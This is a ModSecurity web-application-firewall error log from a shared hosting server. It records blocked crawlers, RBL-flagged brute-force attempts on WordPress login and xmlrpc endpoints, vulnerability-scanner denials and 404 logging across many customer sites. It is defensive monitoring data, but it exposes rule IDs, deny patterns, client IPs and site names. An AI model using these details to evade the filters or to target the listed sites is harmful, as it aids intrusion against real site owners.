[Tue May 26 14:05:16.530057 2026] [security2:error] [pid 578581:tid 578765] [client 114.119.139.1:25673] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "glorodavionics.com"] [uri "/index.php"] [unique_id "ahVbRJm_8al1sb-umPuDLgAAADY"], referer: http://glorodavionics.com/index.php?route=product%2Fmanufacturer%2Finfo&manufacturer_id=11&page=8
[Tue May 26 14:05:16.926806 2026] [security2:error] [pid 578581:tid 578750] [client 57.141.2.44:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVbRJm_8al1sb-umPuDLAAAACc"]
[Tue May 26 14:05:18.255142 2026] [security2:error] [pid 578581:tid 578823] [client 94.25.170.223:9758] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 223.170.25.94.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "rohiniventures.com"] [uri "/wp-comments-post.php"] [unique_id "ahVbRpm_8al1sb-umPuDVwAAAHA"], referer: http://rohiniventures.com/blog/2020/05/09/seo-friendly-business-theme/
[Tue May 26 14:05:18.255281 2026] [security2:error] [pid 578581:tid 578823] [client 94.25.170.223:9758] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "409"] [hostname "rohiniventures.com"] [uri "/wp-comments-post.php"] [unique_id "ahVbRpm_8al1sb-umPuDVwAAAHA"], referer: http://rohiniventures.com/blog/2020/05/09/seo-friendly-business-theme/
[Tue May 26 14:05:18.577723 2026] [security2:error] [pid 578581:tid 578786] [client 2a01:4f8:1c1f:9b4a::1:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "kingsclub.in"] [uri "/wp-login.php"] [unique_id "ahVbRpm_8al1sb-umPuDXQAAS3k"], referer: https://kingsclub.in/wp-login.php
[Tue May 26 14:05:18.864139 2026] [security2:error] [pid 578581:tid 578814] [client 57.141.2.2:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVbRpm_8al1sb-umPuDbAAAAGc"]
[Tue May 26 14:05:21.183774 2026] [security2:error] [pid 578581:tid 578835] [client 57.141.2.62:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVbSJm_8al1sb-umPuDtQAAAHw"]
[Tue May 26 14:05:22.381814 2026] [security2:error] [pid 578581:tid 578816] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVbSZm_8al1sb-umPuD3wAAAGk"]
[Tue May 26 14:05:23.951719 2026] [security2:error] [pid 578581:tid 578768] [client 202.141.30.10:65490] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 10.30.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVbS5m_8al1sb-umPuEHwAAADk"]
[Tue May 26 14:05:23.951839 2026] [security2:error] [pid 578581:tid 578768] [client 202.141.30.10:65490] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVbS5m_8al1sb-umPuEHwAAADk"]
[Tue May 26 14:05:24.548200 2026] [security2:error] [pid 578581:tid 578783] [client 57.141.2.18:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVbTJm_8al1sb-umPuEKQAAAEg"]
[Tue May 26 14:05:26.617076 2026] [security2:error] [pid 578581:tid 578816] [client 57.141.2.38:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVbTpm_8al1sb-umPuEugAAAGk"]
[Tue May 26 14:05:27.266768 2026] [security2:error] [pid 578581:tid 578838] [client 62.244.225.226:29675] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "cagmedya.com"] [uri "/index.php"] [unique_id "ahVbT5m_8al1sb-umPuE1QAAAH8"]
[Tue May 26 14:05:27.559157 2026] [security2:error] [pid 578581:tid 578815] [client 172.226.44.129:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "panda-eco.com"] [uri "/index.php"] [unique_id "ahVbT5m_8al1sb-umPuE4QAAAGg"]
[Tue May 26 14:05:28.198948 2026] [security2:error] [pid 578581:tid 578834] [client 57.141.2.33:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVbT5m_8al1sb-umPuE9AAAAHs"]
[Tue May 26 14:05:30.251725 2026] [security2:error] [pid 578581:tid 578727] [client 57.141.2.47:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVbUZm_8al1sb-umPuFUgAAABA"]
[Tue May 26 14:05:31.510076 2026] [security2:error] [pid 578581:tid 578747] [client 57.141.2.52:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVbU5m_8al1sb-umPuFdAAAACQ"]
[Tue May 26 14:05:34.051356 2026] [security2:error] [pid 578581:tid 578815] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVbVZm_8al1sb-umPuFwgAAAGg"]
[Tue May 26 14:05:34.703855 2026] [security2:error] [pid 578581:tid 578800] [client 70.22.159.144:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVbVpm_8al1sb-umPuF2AAAAFk"]
[Tue May 26 14:05:34.856170 2026] [security2:error] [pid 578581:tid 578806] [client 202.141.30.10:65492] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 10.30.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVbVpm_8al1sb-umPuF8QAAAF8"]
[Tue May 26 14:05:34.856284 2026] [security2:error] [pid 578581:tid 578806] [client 202.141.30.10:65492] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVbVpm_8al1sb-umPuF8QAAAF8"]
[Tue May 26 14:05:35.170515 2026] [security2:error] [pid 578581:tid 578772] [client 57.141.2.38:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVbVpm_8al1sb-umPuF6AAAAD0"]
[Tue May 26 14:05:38.080407 2026] [security2:error] [pid 578581:tid 578837] [client 57.141.2.14:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVbWZm_8al1sb-umPuGOAAAAH4"]
[Tue May 26 14:05:38.090056 2026] [security2:error] [pid 578581:tid 578771] [client 182.253.143.251:42867] ModSecurity: Warning. Pattern match "/(contact(o|.?us)?|wp-comments-post|(send)?.?(form.)?e?mail(er)?|memberlist|send|contact.form(.handler)?|thankyou|leafmailer[0-9.]*)\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1546"] [id "900923"] [msg "contact form logging"] [hostname "lmialumni.org"] [uri "/wp-comments-post.php"] [unique_id "ahVbWZm_8al1sb-umPuGPAAAADw"]
[Tue May 26 14:05:38.362597 2026] [security2:error] [pid 578581:tid 578771] [client 182.253.143.251:42867] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "302"] [hostname "lmialumni.org"] [uri "/wp-comments-post.php"] [unique_id "ahVbWZm_8al1sb-umPuGPAAAADw"]
[Tue May 26 14:05:38.362655 2026] [security2:error] [pid 578581:tid 578771] [client 182.253.143.251:42867] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "lmialumni.org"] [uri "/wp-comments-post.php"] [unique_id "ahVbWZm_8al1sb-umPuGPAAAADw"]
[Tue May 26 14:05:38.586017 2026] [security2:error] [pid 578581:tid 578667] [remote 146.196.64.107:43744] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 107.64.196.146.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "soto-plumbing.com"] [uri "/wp-login.php"] [unique_id "ahVbWpm_8al1sb-umPuGUgAAO1U"]
[Tue May 26 14:05:39.641287 2026] [security2:error] [pid 578581:tid 578815] [client 57.141.2.30:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVbW5m_8al1sb-umPuGdAAAAGg"]
[Tue May 26 14:05:39.641286 2026] [security2:error] [pid 578581:tid 578805] [client 182.253.143.251:42930] ModSecurity: Warning. Pattern match "/(contact(o|.?us)?|wp-comments-post|(send)?.?(form.)?e?mail(er)?|memberlist|send|contact.form(.handler)?|thankyou|leafmailer[0-9.]*)\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1546"] [id "900923"] [msg "contact form logging"] [hostname "lmialumni.org"] [uri "/wp-comments-post.php"] [unique_id "ahVbW5m_8al1sb-umPuGhAAAAF4"]
[Tue May 26 14:05:39.712532 2026] [security2:error] [pid 578581:tid 578805] [client 182.253.143.251:42930] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "429"] [hostname "lmialumni.org"] [uri "/wp-comments-post.php"] [unique_id "ahVbW5m_8al1sb-umPuGhAAAAF4"]
[Tue May 26 14:05:40.653771 2026] [security2:error] [pid 578581:tid 578727] [client 57.141.2.67:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVbXJm_8al1sb-umPuGlwAAABA"]
[Tue May 26 14:05:41.130585 2026] [security2:error] [pid 578581:tid 578724] [client 182.253.143.251:42958] ModSecurity: Warning. Pattern match "/(contact(o|.?us)?|wp-comments-post|(send)?.?(form.)?e?mail(er)?|memberlist|send|contact.form(.handler)?|thankyou|leafmailer[0-9.]*)\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1546"] [id "900923"] [msg "contact form logging"] [hostname "lmialumni.org"] [uri "/wp-comments-post.php"] [unique_id "ahVbXZm_8al1sb-umPuGqgAAAA0"]
[Tue May 26 14:05:41.204981 2026] [security2:error] [pid 578581:tid 578724] [client 182.253.143.251:42958] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "429"] [hostname "lmialumni.org"] [uri "/wp-comments-post.php"] [unique_id "ahVbXZm_8al1sb-umPuGqgAAAA0"]
[Tue May 26 14:05:42.595841 2026] [security2:error] [pid 578581:tid 578806] [client 182.253.143.251:43007] ModSecurity: Warning. Pattern match "/(contact(o|.?us)?|wp-comments-post|(send)?.?(form.)?e?mail(er)?|memberlist|send|contact.form(.handler)?|thankyou|leafmailer[0-9.]*)\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1546"] [id "900923"] [msg "contact form logging"] [hostname "lmialumni.org"] [uri "/wp-comments-post.php"] [unique_id "ahVbXpm_8al1sb-umPuG1QAAAF8"]
[Tue May 26 14:05:42.672817 2026] [security2:error] [pid 578581:tid 578806] [client 182.253.143.251:43007] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "429"] [hostname "lmialumni.org"] [uri "/wp-comments-post.php"] [unique_id "ahVbXpm_8al1sb-umPuG1QAAAF8"]
[Tue May 26 14:05:42.994940 2026] [security2:error] [pid 578581:tid 578739] [client 57.141.2.70:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVbXpm_8al1sb-umPuG1AAAABw"]
[Tue May 26 14:05:44.067233 2026] [security2:error] [pid 578581:tid 578748] [client 182.253.143.251:43057] ModSecurity: Warning. Pattern match "/(contact(o|.?us)?|wp-comments-post|(send)?.?(form.)?e?mail(er)?|memberlist|send|contact.form(.handler)?|thankyou|leafmailer[0-9.]*)\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1546"] [id "900923"] [msg "contact form logging"] [hostname "lmialumni.org"] [uri "/wp-comments-post.php"] [unique_id "ahVbYJm_8al1sb-umPuHBwAAACU"]
[Tue May 26 14:05:44.143722 2026] [security2:error] [pid 578581:tid 578748] [client 182.253.143.251:43057] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "429"] [hostname "lmialumni.org"] [uri "/wp-comments-post.php"] [unique_id "ahVbYJm_8al1sb-umPuHBwAAACU"]
[Tue May 26 14:05:44.307787 2026] [security2:error] [pid 578581:tid 578714] [client 57.141.2.47:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVbX5m_8al1sb-umPuG_QAAAAM"]
[Tue May 26 14:05:45.812014 2026] [security2:error] [pid 578581:tid 578730] [client 202.141.30.10:35385] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 10.30.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVbYZm_8al1sb-umPuHOgAAABM"]
[Tue May 26 14:05:45.812128 2026] [security2:error] [pid 578581:tid 578730] [client 202.141.30.10:35385] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVbYZm_8al1sb-umPuHOgAAABM"]
[Tue May 26 14:05:45.860351 2026] [security2:error] [pid 578581:tid 578804] [client 185.198.240.106:61049] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 106.240.198.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "jiyani.in"] [uri "/wp-login.php"] [unique_id "ahVbYZm_8al1sb-umPuHMwAAAF0"]
[Tue May 26 14:05:47.115968 2026] [security2:error] [pid 578581:tid 578811] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVbYpm_8al1sb-umPuHVQAAAGQ"]
[Tue May 26 14:05:48.565620 2026] [security2:error] [pid 578581:tid 578714] [client 57.141.2.46:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVbZJm_8al1sb-umPuHhwAAAAM"]
[Tue May 26 14:05:49.666773 2026] [security2:error] [pid 578581:tid 578782] [client 185.191.171.11:21520] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/tag/july-21-25/day/2024-06-13/"] [unique_id "ahVbZZm_8al1sb-umPuHuAAAAEc"]
[Tue May 26 14:05:49.666882 2026] [security2:error] [pid 578581:tid 578782] [client 185.191.171.11:21520] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/tag/july-21-25/day/2024-06-13/"] [unique_id "ahVbZZm_8al1sb-umPuHuAAAAEc"]
[Tue May 26 14:05:50.344639 2026] [security2:error] [pid 578581:tid 578821] [client 57.141.2.48:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVbZZm_8al1sb-umPuHwgAAAG4"]
[Tue May 26 14:05:51.696556 2026] [security2:error] [pid 578581:tid 578804] [client 57.141.2.47:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVbZ5m_8al1sb-umPuH7QAAAF0"]
[Tue May 26 14:05:53.519434 2026] [security2:error] [pid 578581:tid 578734] [client 57.141.2.48:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVbaZm_8al1sb-umPuIGQAAABc"]
[Tue May 26 14:05:55.075514 2026] [security2:error] [pid 578581:tid 578717] [client 185.165.240.73:29042] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "www.cagmedya.com"] [uri "/xmlrpc.php"] [unique_id "ahVbapm_8al1sb-umPuIRQAAAAY"], referer: https://www.cagmedya.com/
[Tue May 26 14:05:55.839795 2026] [security2:error] [pid 578581:tid 578779] [client 57.141.2.58:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVba5m_8al1sb-umPuIZQAAAEQ"]
[Tue May 26 14:05:56.294700 2026] [security2:error] [pid 578581:tid 578719] [client 14.178.29.126:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVba5m_8al1sb-umPuIdAAAAAg"]
[Tue May 26 14:05:56.861797 2026] [security2:error] [pid 578581:tid 578806] [client 202.141.30.10:35580] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 10.30.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVbbJm_8al1sb-umPuIlgAAAF8"]
[Tue May 26 14:05:56.861938 2026] [security2:error] [pid 578581:tid 578806] [client 202.141.30.10:35580] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVbbJm_8al1sb-umPuIlgAAAF8"]
[Tue May 26 14:05:57.401117 2026] [security2:error] [pid 578581:tid 578609] [remote 152.53.111.131:59438] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 131.111.53.152.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "crustiesplacebakery.com.thedebateafrica.org"] [uri "/wp-login.php"] [unique_id "ahVbbZm_8al1sb-umPuIpwAAPBs"]
[Tue May 26 14:05:57.427266 2026] [security2:error] [pid 578581:tid 578745] [client 57.141.2.27:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVbbJm_8al1sb-umPuIngAAACI"]
[Tue May 26 14:05:59.317736 2026] [security2:error] [pid 578581:tid 578796] [client 216.73.216.242:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "afstpaul.org"] [uri "/index.php"] [unique_id "ahVbbpm_8al1sb-umPuI4QAAAFU"]
[Tue May 26 14:05:59.456354 2026] [security2:error] [pid 578581:tid 578716] [client 57.141.2.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVbb5m_8al1sb-umPuI5gAAAAU"]
[Tue May 26 14:06:01.341336 2026] [security2:error] [pid 578581:tid 578783] [client 57.141.2.10:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVbcJm_8al1sb-umPuJGgAAAEg"]
[Tue May 26 14:06:03.187537 2026] [security2:error] [pid 578581:tid 578816] [client 57.141.2.27:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVbcpm_8al1sb-umPuJcQAAAGk"]
[Tue May 26 14:06:03.374791 2026] [security2:error] [pid 578581:tid 578802] [client 128.140.41.193:23364] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "ucdc.co.in"] [uri "/index.php"] [unique_id "ahVbc5m_8al1sb-umPuJiAAAAFs"], referer: http://ucdc.co.in/
[Tue May 26 14:06:03.665885 2026] [security2:error] [pid 578581:tid 578655] [remote 110.249.202.86:0] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "kingsclub.in"] [uri "/billiards/"] [unique_id "ahVbc5m_8al1sb-umPuJkwAAMEk"]
[Tue May 26 14:06:04.238544 2026] [security2:error] [pid 578581:tid 578792] [client 185.231.155.169:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVbcpm_8al1sb-umPuJfQAAAFE"], referer: http://anujtradingco.com/homepages/portfolio-photo/
[Tue May 26 14:06:04.882431 2026] [security2:error] [pid 578581:tid 578758] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVbdJm_8al1sb-umPuJsAAAAC8"]
[Tue May 26 14:06:06.487696 2026] [security2:error] [pid 578581:tid 578800] [client 57.141.2.28:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVbdpm_8al1sb-umPuJ7QAAAFk"]
